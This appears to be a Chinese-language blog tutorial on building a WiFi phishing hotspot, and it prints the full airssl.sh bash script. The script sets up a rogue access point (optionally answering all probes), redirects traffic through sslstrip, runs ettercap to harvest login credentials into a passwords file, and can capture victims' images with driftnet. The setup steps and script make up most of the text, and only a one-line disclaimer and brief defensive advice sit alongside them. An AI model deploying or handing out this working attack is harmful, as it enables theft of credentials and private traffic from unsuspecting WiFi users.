10分钟让你做Wifi钓鱼!
近来几天又在忙,文章更新速度又变慢了,对不起大家哈 。不知道大家有没有看今年的315晚会,除了有奇葩的播出时间和各大牌子中枪外,对于我这种伪极客来说,最吸引眼球的就是当场示范钓鱼WiFi。以前我给亲朋好友就说过这个事,公共WiFi不安全,但是他们觉得无关紧要,不知道他们看见今年的晚会会作何感想。
我答应过群里的朋友,我的网站会发布一些黑客方面的文章,正愁不知道写什么好,恰巧看见了这个,所以我就决定为大家简单揭秘下,其实很简单。但是我事先声明,本篇教程仅供学习,请勿用于违法用途。在这里顺便警告下找我盗qq的朋友。
好了,言归正传。先说说要求,很多人总是觉得这些东西是黑客学的,很难很难,其实我想说,其实真的简单,你不需要太多的技术,只需要熟练用电脑的技术就行了。
本次介绍的攻击手法是采用airssl.sh这个bash脚本,建立钓鱼热点。
原理:sslstrip+ettercap进行数据包的截获
0x01 配置
默认情况下,Backtrack的sslstrip和DHCP服务需要重新安装和设置。
如果你不懂,接着看就行了。
首先,你需要一台电脑,可以是笔记本,也可以是台式,能有个WiFi网卡就行了。
其次系统里面安装了Backtrack(一个电脑系统),如果你不想把自己系统弄坏,可以在虚拟机里面安装。不知道怎么安装系统的朋友参考下面的文章:
安装好了BT,就能继续了。
1.安装sslstrip
安装文件:
1 |
/pentest/web/sslstrip/setup.py |
安装命令:
1 |
pythonsetup.pyinstall |
2.DHCP的安装与配置:
①.安装 dhcp3 服务器:sudo apt-get install dhcp3-server
②.配置 dhcp3 服务,文件/etc/dhcp3/dhcpd.conf
1 2 3 4 5 6 7 8 9 |
subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.2 192.168.1.100; optiondomain-name-serversns1.internal.example.org; optiondomain-name "internal.example.org"; optionrouters 192.168.1.1; optionbroadcast-address 192.168.1.101; default-lease-time 600; max-lease-time 7200; } |
③.重新启动服务sudo /etc/init.d/dhcp3-server restart
④.更改 dhcp3 服务监听的网卡,可以修改
1 2 |
/etc/default/dhcp3-server INTERFACES="eth1" |
0x02 建立热点
为airssl.sh添加执行权限,执行(相关输入输入)
然后分别是AP建立、DHCP建立、sslstrip开启、ettercap开启,如图所示:
0x03 测试
使用某android手机连接,
bash中会显示已经连接的设备:
测试百度帐号登录:
测试新浪微博登录:
0x04 防护
由于这种钓鱼攻击属于中间人攻击,较难被发现。谨慎使用未知的热点,尽量在可信的网络环境中登录帐号。
# 补充:airssl.sh代码如下:
#!/bin/bash
# ?opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon ?"
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name ""$ESSID"";
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}" > /pentest/wireless/airssl/dhcpd.conf
# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
read ANSWER
if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi
if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3
# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi
if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use ""interface type"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi
if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi
# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT
if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."
kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}
airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit
fi
exit
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。